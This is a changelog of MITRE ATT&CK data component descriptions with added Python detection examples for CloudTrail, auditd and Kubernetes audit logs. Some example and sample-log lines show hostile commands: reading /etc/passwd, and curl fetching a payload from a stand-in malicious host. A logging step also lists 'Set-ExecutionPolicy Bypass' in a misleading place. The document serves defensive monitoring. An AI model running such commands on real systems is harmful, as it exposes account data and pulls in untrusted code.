- Google Cloud Storage: Enable Data Access logs in Cloud Audit Logs to monitor storage.buckets.create API calls.
- OpenStack Swift: Configure Swift logging to capture PUT requests to new containers.
Centralized Logging and Analysis
- Forward logs to centralized platforms like Splunk or cloud-native SIEM solutions for correlation and analysis. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:58.772Z |
description | Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket) | Cloud Storage Deletion refers to the removal or destruction of cloud storage infrastructure, such as buckets, containers, or directories, within a cloud environment. Monitoring this activity is critical to detecting potential unauthorized or malicious actions, such as data destruction by adversaries or accidental deletions that may lead to data loss. Examples:
- AWS S3 Bucket Deletion: An AWS user deletes an S3 bucket using the `DeleteBucket` API call.
- Azure Blob Storage Container Deletion: A user deletes a container in Azure Blob Storage using the `Delete Container` operation.
- Google Cloud Storage Bucket Deletion: A Google Cloud user deletes a bucket using the `storage.buckets.delete` API.
- OpenStack Swift Container Deletion: A user deletes a container in OpenStack Swift using the `DELETE` method.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Services
- AWS S3: Enable AWS CloudTrail to log DeleteBucket API actions.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs to capture Delete Container operations. Use Azure Event Grid to capture and trigger alerts for container deletion.
- Google Cloud Storage: Enable Data Access logs in Cloud Audit Logs to monitor storage.buckets.delete API calls.
- OpenStack Swift: Configure Swift logging to capture DELETE requests for containers.
Centralized Logging and Analysis
- Use platforms like Splunk or native SIEMs to forward and analyze logs for anomalies in cloud storage deletions. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:55.587Z |
description | An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects) | Cloud Storage Enumeration involves retrieving a list of available cloud storage infrastructure, such as buckets, containers, or objects, within a cloud environment. This activity may be performed for legitimate administrative purposes or malicious reconnaissance by adversaries seeking to identify accessible storage resources. Examples:
- AWS S3 Bucket Enumeration: An AWS user lists all buckets using the `ListBuckets` API call.
- Azure Blob Storage Container Enumeration: A user retrieves a list of all containers within a storage account using the Azure Storage SDK or API.
- Google Cloud Storage Bucket Enumeration: A Google Cloud user lists all buckets within a project using the `storage.buckets.list` API.
- OpenStack Swift Container Enumeration: A user retrieves a list of containers in OpenStack Swift using the `GET` method on the storage endpoint.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Enumeration
- AWS S3: Enable AWS CloudTrail to capture ListBuckets and ListObjects API calls.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs to capture enumeration operations like List Containers. Use Azure Event Grid to trigger alerts for container enumeration.
- Google Cloud Storage: Enable Audit Logs in Google Cloud to track storage.buckets.list API activity.
- OpenStack Swift: Configure Swift logging to capture GET requests for container enumeration.
Centralized Log Aggregation
- Use platforms like Splunk or native SIEM solutions to collect and analyze enumeration logs. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:52.404Z |
description | Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner | Cloud Storage Metadata provides contextual information about cloud storage infrastructure and its associated activity. This data may include attributes such as storage name, size, owner, permissions, creation date, region, and activity metadata. It is essential for monitoring, auditing, and identifying anomalies in cloud storage environments. Examples:
- AWS S3 Bucket Metadata: Metadata about an S3 bucket includes the bucket name, region, creation date, owner, storage class, and permissions.
- Azure Blob Storage Metadata: Metadata for an Azure Blob container includes container name, access level (e.g., private or public), size, and tags.
- Google Cloud Storage Metadata: Metadata includes bucket name, storage class, location, labels, lifecycle policies, and versioning status.
- OpenStack Swift Metadata: Metadata for a Swift container includes name, access level, quota, and custom attributes.
This data component can be collected through the following measures:
Enable Logging for Metadata Collection
- AWS S3: Use AWS CloudTrail to log `GetBucketAcl`, `GetBucketPolicy`, and `HeadBucket` API calls.
- Azure Blob Storage: Use Azure Monitor to log container metadata retrieval and updates.
- Google Cloud Storage: Enable Google Cloud Audit Logs to capture `storage.buckets.get` and `storage.buckets.update`.
- OpenStack Swift: Enable logging of `HEAD` or `GET` requests to containers.
Centralized Log Aggregation
- Use a SIEM solution (e.g., Splunk) to aggregate and analyze metadata retrieval and modification logs.
- Correlate metadata access with user actions, IP addresses, and other contextual data.
API Polling
- Use cloud SDKs or APIs to periodically query metadata for analysis:
- AWS CLI Example: `aws s3api get-bucket-acl --bucket company-sensitive-data`
- Azure CLI Example: `az storage container show --name customer-records`
- Google Cloud CLI Example: `gcloud storage buckets describe user-uploads` |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:45.928Z |
description | Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl) | Cloud Storage Modification involves tracking changes made to cloud storage infrastructure, including updates to settings, permissions, or stored data. Examples include modifying object access control lists (ACLs), uploading new objects, or updating bucket policies. Examples:
- AWS S3: An object is uploaded or its ACL is modified.
- Azure Blob Storage: A blob's metadata or permissions are updated.
- Google Cloud Storage: An object's lifecycle policy is updated, or a bucket policy is changed.
- OpenStack Swift: Modifications to container settings or uploading of new objects.
This data component can be collected through the following measures:
Enable Logging
- AWS S3: Enable AWS CloudTrail to log API events like PutObject, PutObjectAcl, and PutBucketPolicy.
- Azure Blob Storage: Use Azure Monitor to log write and update operations.
- Google Cloud Storage: Enable Google Cloud Audit Logs to track storage.objects.update and storage.buckets.update.
- OpenStack Swift: Enable logging for PUT and POST requests to track object uploads and container metadata updates.
Use Cloud Monitoring Tools
- Integrate with tools like AWS Config, Azure Security Center, or Google Cloud Monitoring to detect configuration drift or unauthorized changes.
Centralized Log Aggregation
- Use a SIEM (e.g., Splunk) to aggregate logs across multiple cloud providers for unified monitoring and analysis.
Periodic API Queries
- AWS CLI Example: Query recent modifications to bucket policies: `aws s3api get-bucket-policy --bucket sensitive-data`
- Azure CLI Example: List changes to a blob container: `az storage blob show --container-name private-docs`
- Google Cloud CLI Example: Check metadata updates: `gcloud storage objects describe gs://user-uploads/document.txt` |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
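The collection guidance in the Cloud Service Modification and Cloud Storage descriptions above names the CloudTrail and S3 API events that map to each data component and recommends alerting on logging being disabled or policies and ACLs being changed, then correlating storage access with identity. As an added example (not part of this changelog or of MITRE's tooling), the Python below labels constructed CloudTrail-style records with those data components, raises the recommended alerts, and applies that identity correlation; the sample records, the choice of which events alert, and the function names are all assumptions made here.

```python
import json
from dataclasses import dataclass

# Constructed CloudTrail-style records, one JSON object per line (not real
# telemetry). The account id is the AWS documentation placeholder; the bucket
# name is the one quoted in the Cloud Storage Metadata guidance above.
SAMPLE_EVENTS = """\
{"eventTime": "2025-04-18T15:10:01Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"name": "org-trail"}}
{"eventTime": "2025-04-18T15:10:07Z", "eventSource": "config.amazonaws.com", "eventName": "DeleteConfigRule", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"configRuleName": "s3-bucket-public-read-prohibited"}}
{"eventTime": "2025-04-18T15:11:02Z", "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": null}
{"eventTime": "2025-04-18T15:11:30Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"bucketName": "company-sensitive-data", "key": "export.csv"}}
{"eventTime": "2025-04-18T15:12:00Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketPolicy", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"bucketName": "company-sensitive-data"}}
{"eventTime": "2025-04-18T15:12:10Z", "eventSource": "s3.amazonaws.com", "eventName": "CreateBucket", "userIdentity": {"arn": "arn:aws:iam::123456789012:role/deploy"}, "requestParameters": {"bucketName": "app-assets-prod"}}
{"eventTime": "2025-04-18T15:12:30Z", "eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity", "userIdentity": {"arn": "arn:aws:iam::123456789012:role/deploy"}}
"""

# CloudTrail eventName -> (ATT&CK data component, alert?) for the API names the
# descriptions cite. Which events deserve an alert is this example's own choice:
# the text singles out disabling logging and ACL/policy changes as high risk.
EVENT_MAP = {
    "StopLogging": ("Cloud Service Modification", True),
    "DeleteTrail": ("Cloud Service Modification", True),
    "DeleteConfigRule": ("Cloud Service Modification", True),
    "GetObject": ("Cloud Storage Access", False),
    "CreateBucket": ("Cloud Storage Creation", False),
    "DeleteBucket": ("Cloud Storage Deletion", True),
    "ListBuckets": ("Cloud Storage Enumeration", False),
    "ListObjects": ("Cloud Storage Enumeration", False),
    "GetBucketAcl": ("Cloud Storage Metadata", False),
    "GetBucketPolicy": ("Cloud Storage Metadata", False),
    "HeadBucket": ("Cloud Storage Metadata", False),
    "PutObject": ("Cloud Storage Modification", False),
    "PutObjectAcl": ("Cloud Storage Modification", True),
    "PutBucketPolicy": ("Cloud Storage Modification", True),
}
STORAGE_COMPONENTS = {c for c, _ in EVENT_MAP.values() if c.startswith("Cloud Storage")}


@dataclass
class Finding:
    event_time: str
    event_name: str
    component: str
    identity: str
    resource: str
    alert: bool


def parse_events(text):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def identity_of(record):
    ui = record.get("userIdentity") or {}
    return ui.get("arn") or ui.get("principalId") or "unknown"


def resource_of(record):
    """Best-effort resource name: bucket, trail, or Config rule."""
    p = record.get("requestParameters") or {}
    return p.get("bucketName") or p.get("name") or p.get("configRuleName") or "-"


def classify(records):
    """Label every record whose eventName maps to a data component, in time order."""
    out = []
    for r in sorted(records, key=lambda r: r.get("eventTime", "")):
        if r.get("eventName") in EVENT_MAP:
            component, alert = EVENT_MAP[r["eventName"]]
            out.append(Finding(r.get("eventTime", ""), r["eventName"], component,
                               identity_of(r), resource_of(r), alert))
    return out


def alerts(records):
    """The high-risk subset the guidance says to alert on."""
    return [f for f in classify(records) if f.alert]


def logging_tamper_then_storage(records):
    """Identities that weakened logging or Config monitoring and afterwards
    touched cloud storage: the storage/identity correlation the text recommends,
    reduced to its simplest sequence check."""
    tampered = set()
    flagged = set()
    for f in classify(records):
        if f.component == "Cloud Service Modification" and f.alert:
            tampered.add(f.identity)
        elif f.component in STORAGE_COMPONENTS and f.identity in tampered:
            flagged.add(f.identity)
    return sorted(flagged)


if __name__ == "__main__":
    recs = parse_events(SAMPLE_EVENTS)
    for f in alerts(recs):
        print(f"ALERT {f.event_time} {f.identity} {f.event_name} {f.resource}")
    print("tamper-then-storage:", logging_tamper_then_storage(recs))
```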
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
- dir – Lists directory contents.
- net user – Queries or manipulates user accounts.
- tasklist – Lists running processes.
- PowerShell
- Get-Process – Retrieves processes running on a system.
- Set-ExecutionPolicy – Changes PowerShell script execution policies.
- Invoke-WebRequest – Downloads remote resources.
- Linux Shell
- ls – Lists files in a directory.
- cat /etc/passwd – Reads the user accounts file.
- curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
- docker exec – Executes a command inside a running container.
- kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
- open – Opens files or URLs.
- dscl . -list /Users – Lists all users on the system.
- osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
- Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
- Enable Windows Event Logging:
- Event ID 4688: Tracks process creation, including command-line arguments.
- Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
- Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
- Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
- Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
`index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
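The collection measures above for Linux end with an auditd rule keyed `cmd_exec`. What that rule actually yields is a pair of records per execve (a SYSCALL record and an EXECVE record sharing one audit event id), and long or whitespace-containing arguments arrive hex-encoded, so the command line has to be reassembled before it can be searched. The following is an added example, not code from the ATT&CK changelog or from MITRE; the audit log lines are constructed, and the field layout follows the standard auditd text format.

```python
"""Reconstruct command lines from Linux auditd records.

Added example (not ATT&CK's own code) for the Command Execution data component:
with the rule `-a always,exit -F arch=b64 -S execve -k cmd_exec` in place, every
execve produces a SYSCALL record and an EXECVE record that share one audit event
id. The log lines below are constructed, not captured from a real host.
"""
import re
from collections import defaultdict

SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713450000.123:4567): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1201 auid=1000 uid=1000 euid=1000 tty=pts0 comm="curl" exe="/usr/bin/curl" key="cmd_exec"
type=EXECVE msg=audit(1713450000.123:4567): argc=3 a0="curl" a1="-sS" a2="http://malicious-site.com/payload"
type=SYSCALL msg=audit(1713450001.500:4570): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1210 auid=1000 uid=1000 euid=1000 tty=pts0 comm="cat" exe="/usr/bin/cat" key="cmd_exec"
type=EXECVE msg=audit(1713450001.500:4570): argc=2 a0="cat" a1="/etc/passwd"
type=SYSCALL msg=audit(1713450002.000:4571): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1211 auid=1000 uid=1000 euid=1000 tty=pts0 comm="echo" exe="/usr/bin/echo" key="cmd_exec"
type=EXECVE msg=audit(1713450002.000:4571): argc=2 a0="echo" a1=68656C6C6F20776F726C64
type=EXECVE msg=audit(1713450003.000:4580): argc=1 a0="orphan"
"""

_MSG = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
_TOKEN = re.compile(r'([\w\[\]]+)=("(?:[^"\\]|\\.)*"|\S+)')
_ARG = re.compile(r"^a(\d+)(?:\[(\d+)\])?$")


def _unquote(value):
    return value[1:-1] if len(value) >= 2 and value[0] == value[-1] == '"' else value


def _decode_arg(value):
    """auditd quotes ordinary arguments; an argument containing whitespace or
    non-printable bytes is written as unquoted hex, which must be decoded."""
    if value.startswith('"'):
        return _unquote(value)
    if len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
        return bytes.fromhex(value).decode("utf-8", errors="replace")
    return value


def parse_record(line):
    """Split one audit line into its event id, timestamp, record type and raw fields."""
    m = _MSG.search(line)
    if not m:
        return None
    fields = dict(_TOKEN.findall(line))
    return {"timestamp": float(m.group(1)), "event_id": m.group(2),
            "type": fields.get("type"), "fields": fields}


def _collect_argv(execve_fields):
    """Order a0, a1, ... and re-join long arguments auditd splits into a1[0], a1[1], ..."""
    pieces = {}
    for key, value in execve_fields.items():
        m = _ARG.match(key)
        if m:
            idx, frag = int(m.group(1)), int(m.group(2) or 0)
            pieces.setdefault(idx, {})[frag] = _decode_arg(value)
    return ["".join(frags[i] for i in sorted(frags)) for _, frags in sorted(pieces.items())]


def reconstruct_commands(log_text):
    """Join SYSCALL and EXECVE records by audit event id; one dict per complete execve."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec:
            events[rec["event_id"]].setdefault("timestamp", rec["timestamp"])
            events[rec["event_id"]][rec["type"]] = rec["fields"]
    commands = []
    for event_id, parts in events.items():
        if "SYSCALL" not in parts or "EXECVE" not in parts:
            continue  # half an event, e.g. cut by log rotation: do not guess the rest
        sc = parts["SYSCALL"]
        argv = _collect_argv(parts["EXECVE"])
        commands.append({
            "event_id": event_id, "timestamp": parts["timestamp"],
            "auid": sc.get("auid"), "uid": sc.get("uid"), "pid": sc.get("pid"),
            "ppid": sc.get("ppid"), "exe": _unquote(sc.get("exe", "")),
            "key": _unquote(sc.get("key", "")), "argv": argv, "cmdline": " ".join(argv),
        })
    return sorted(commands, key=lambda c: c["timestamp"])


if __name__ == "__main__":
    for cmd in reconstruct_commands(SAMPLE_AUDIT_LOG):
        print(f'{cmd["timestamp"]:.3f} auid={cmd["auid"]} pid={cmd["pid"]} {cmd["cmdline"]}')
```

The `auid` field survives `sudo` and `su`, so it, rather than `uid`, is the value to attribute a command to a person; the orphan EXECVE record in the sample shows why joining on the event id, rather than on adjacency, matters when records are interleaved or truncated.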
Container: Container Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:30.196Z |
description | Initial construction of a new container (ex: docker create <container_name>) | "Container Creation" data component captures details about the initial construction of a container in a containerized environment. This includes events where a new container is instantiated, such as through Docker, Kubernetes, or other container orchestration platforms. Monitoring these events helps detect unauthorized or potentially malicious container creation. Examples:
- Docker Example: `docker create my-container`, `docker run --name=my-container nginx:latest`
- Kubernetes Example: `kubectl run my-pod --image=nginx`, `kubectl create deployment my-deployment --image=nginx`
- Cloud Container Services Example
- AWS ECS: Task or service creation (`RunTask` or `CreateService`).
- Azure Container Instances: Deployment of a container group.
- Google Kubernetes Engine (GKE): Creation of new pods via GCP APIs.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker daemon logging to capture `create` commands. Configure the Docker daemon to use a log driver such as `syslog` or `json-file`.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging:
- Cloud Provider Logs
- AWS CloudTrail: Enable logging for ECS `RunTask` or `CreateService` events.
- Azure Monitor: Enable activity logging for container group creation.
- GCP Cloud Logging: Monitor API calls such as `container.projects.zones.clusters.create`.
- SIEM Integration: Use a SIEM to collect logs from Docker, Kubernetes, or cloud platforms. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Container: Container Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:36.677Z |
description | An extracted list of containers (ex: docker ps) | "Container Enumeration" data component captures events and actions related to listing and identifying active or available containers within a containerized environment. This includes information about running, stopped, or configured containers, such as their names, IDs, statuses, or associated images. Monitoring this activity is crucial for detecting unauthorized discovery or reconnaissance efforts. Examples:
- Docker Example: `docker ps`, `docker ps -a`
- Kubernetes Example: `kubectl get pods`, `kubectl get deployments`
- Cloud Container Services Example
- AWS ECS: API Call: ListTasks or ListContainers
- Azure Kubernetes Service: API Call: List pod or container instances.
- Google Kubernetes Engine (GKE): API Call: Retrieve deployments and their associated containers.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker daemon logging to capture enumeration commands. Use tools like auditd to monitor terminal activity involving docker ps or similar commands.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging. Capture events where users query resources such as pods, deployments, or services.
- Cloud Provider Logs
- AWS CloudTrail: Enable logging for API calls like ListTasks or DescribeTasks.
- Azure Monitor: Enable activity logging to track container-related queries.
- GCP Cloud Logging: Track API events involving container enumerations or deployments.
- SIEM Integration: Collect logs from Docker, Kubernetes, and cloud services for centralized analysis. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
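Both the Container Creation and the Container Enumeration entries above list "enable Kubernetes API server audit logging" as the collection measure without saying how the resulting events map onto the two components. The following is an added example, not code from the ATT&CK changelog or from MITRE, showing that mapping over constructed `audit.k8s.io/v1` events: the same `create` verb has to be split between pod creation and `pods/exec` (which is command execution), each request appears at several stages and must be counted once, and control-plane principals enumerate pods constantly and should be kept out of the human baseline. The resource list and the treatment of `system:` users are assumptions.

```python
"""Classify Kubernetes API server audit events into ATT&CK data components.

Added example (not ATT&CK's own code) for Container Creation and Container
Enumeration. The JSON lines below are constructed, not taken from a real
cluster; the set of workload resources and the handling of "system:" users are
assumptions to adjust per cluster.
"""
import json
from collections import defaultdict

SAMPLE_AUDIT_LOG = """\
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"RequestReceived","verb":"create","user":{"username":"alice"},"objectRef":{"resource":"pods","namespace":"default","name":"my-pod"},"requestURI":"/api/v1/namespaces/default/pods"}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"alice"},"objectRef":{"resource":"pods","namespace":"default","name":"my-pod"},"requestURI":"/api/v1/namespaces/default/pods","responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"alice"},"objectRef":{"apiGroup":"apps","resource":"deployments","namespace":"default","name":"my-deployment"},"requestURI":"/apis/apps/v1/namespaces/default/deployments","responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"list","user":{"username":"alice"},"objectRef":{"resource":"pods","namespace":"default"},"requestURI":"/api/v1/namespaces/default/pods?limit=500","responseStatus":{"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"list","user":{"username":"system:kube-scheduler"},"objectRef":{"resource":"pods"},"requestURI":"/api/v1/pods","responseStatus":{"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"alice"},"objectRef":{"resource":"pods","namespace":"default","name":"my-pod","subresource":"exec"},"requestURI":"/api/v1/namespaces/default/pods/my-pod/exec?command=sh","responseStatus":{"code":101}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"bob"},"objectRef":{"resource":"pods","namespace":"prod","name":"debug-pod"},"requestURI":"/api/v1/namespaces/prod/pods","responseStatus":{"code":403}}
"""

# Assumed set of resources whose creation or listing concerns containers.
WORKLOAD_RESOURCES = {"pods", "deployments", "replicasets", "daemonsets",
                      "statefulsets", "jobs", "cronjobs"}


def classify_event(event):
    """Return the data component an audit event belongs to, or None to skip it."""
    if event.get("stage") != "ResponseComplete":
        return None  # a request is logged at several stages; count it once, with its outcome
    ref = event.get("objectRef") or {}
    if ref.get("resource") not in WORKLOAD_RESOURCES:
        return None
    user = (event.get("user") or {}).get("username", "")
    if user.startswith("system:") and not user.startswith("system:serviceaccount:"):
        return "control_plane"  # scheduler, controllers, kubelets: baseline noise, not discovery
    code = (event.get("responseStatus") or {}).get("code", 0)
    verb = event.get("verb")
    sub = ref.get("subresource")
    if sub in ("exec", "attach"):
        return "command_execution"  # verb is "create" here too, but no container is created
    if sub:
        return None  # status, log, portforward, ... are outside these two components
    if verb == "create":
        return "container_creation" if 200 <= code < 300 else "container_creation_denied"
    if verb in ("get", "list", "watch"):
        return "container_enumeration" if 200 <= code < 300 else None
    return None


def parse_audit_log(text):
    """The API server audit log is one JSON event per line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def summarize(events):
    """Group classified events by data component with the fields an analyst pivots on."""
    summary = defaultdict(list)
    for event in events:
        component = classify_event(event)
        if component is None:
            continue
        ref = event.get("objectRef") or {}
        summary[component].append({
            "user": (event.get("user") or {}).get("username"),
            "verb": event.get("verb"),
            "resource": ref.get("resource"),
            "namespace": ref.get("namespace"),
            "name": ref.get("name"),
        })
    return dict(summary)


if __name__ == "__main__":
    for component, rows in summarize(parse_audit_log(SAMPLE_AUDIT_LOG)).items():
        print(component)
        for row in rows:
            print("  ", row)
```

Denied creations (HTTP 403) are kept as their own bucket because a user repeatedly trying to create pods in a namespace they cannot write to is itself worth a look, while a successful creation is what the Container Creation component is about.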
Container: Container Start
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:33.436Z |
description | Activation or invocation of a container (ex: docker start or docker restart) | "Container Start" data component captures events related to the activation or invocation of a container within a containerized environment. This includes starting a previously stopped container, restarting an existing container, or initializing a container for runtime. Monitoring these activities is critical for identifying unauthorized or unexpected container activations, which may indicate potential adversarial activity or misconfigurations. Examples:
- Docker Example: `docker start <container_name>`, `docker restart <container_name>`
- Kubernetes Example: Kubernetes automatically restarts containers as part of pod lifecycle management (e.g., due to health checks or configuration changes).
- Cloud-Native Example
- AWS ECS: API Call: StartTask to activate a stopped ECS task.
- Azure Container Instances: Command to restart a container group instance.
- GCP Kubernetes Engine: Automatic restarts as part of node or pod management.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker logging to capture start and restart events. Use tools like auditd to monitor terminal activity involving container lifecycle commands.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging.
- Cloud Provider Logs
- AWS CloudTrail: Capture StartTask or related API calls for ECS.
- Azure Monitor: Track activity in container groups that indicate start or restart events.
- GCP Cloud Logging: Record logs related to pod restarts or scaling events in Kubernetes Engine.
- SIEM Integration: Collect logs from Docker, Kubernetes, and cloud services to correlate container start events. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Domain Name: Domain Registration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:16:34.616Z |
description | Information about domain name assignments and other domain metadata (ex: WHOIS) | "Domain Name: Domain Registration" data component captures information about the assignment, ownership, and metadata of domain names. This information is often sourced from registries like WHOIS and includes details such as registrant names, contact information, registration dates, expiration dates, and registrar details. This data is invaluable for tracking domain ownership, detecting malicious domain registrations, and identifying trends in adversary behavior. Examples:
- Registrant Information: WHOIS lookup of example.com
- Registration and Expiration Dates: A domain registered a week before being used in phishing attacks.
- Domain Status: Status codes like clientTransferProhibited or serverHold indicate domain restrictions or potential hijacking activity.
- Name Server Information: Name servers point to a public DNS provider often associated with malicious campaigns.
- Privacy Protection: A domain uses WHOIS privacy protection to hide registrant details.
This data component can be collected through the following measures:
- WHOIS Services: Use tools or services to perform WHOIS lookups:
- WHOIS APIs: Automate domain registration lookups with APIs:
- Registrar Platforms: Directly query domain registrars (e.g., GoDaddy, Namecheap) for detailed registration data.
- Threat Intelligence Platforms: Integrate domain registration data from services like Recorded Future, RiskIQ, or PassiveTotal for enriched analysis. |
x_mitre_version | 1.0 | 1.1 |
